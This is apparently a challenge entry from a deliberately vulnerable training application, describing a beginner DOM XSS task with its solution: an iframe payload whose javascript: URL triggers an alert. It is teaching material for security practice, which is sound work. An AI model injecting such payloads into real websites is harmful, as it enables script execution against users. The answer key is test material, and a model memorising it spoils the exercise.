DOM XSS
Difficulty: 🌟
Description: Perform a DOM XSS attack with <iframe src="javascript:alert(xss)">.
Category: XSS
Tags: Good for Demos, Tutorial
Solution:
Paste the code below to try to exploit XSS attack:
<iframe src="javascript:alert(`xss`)">
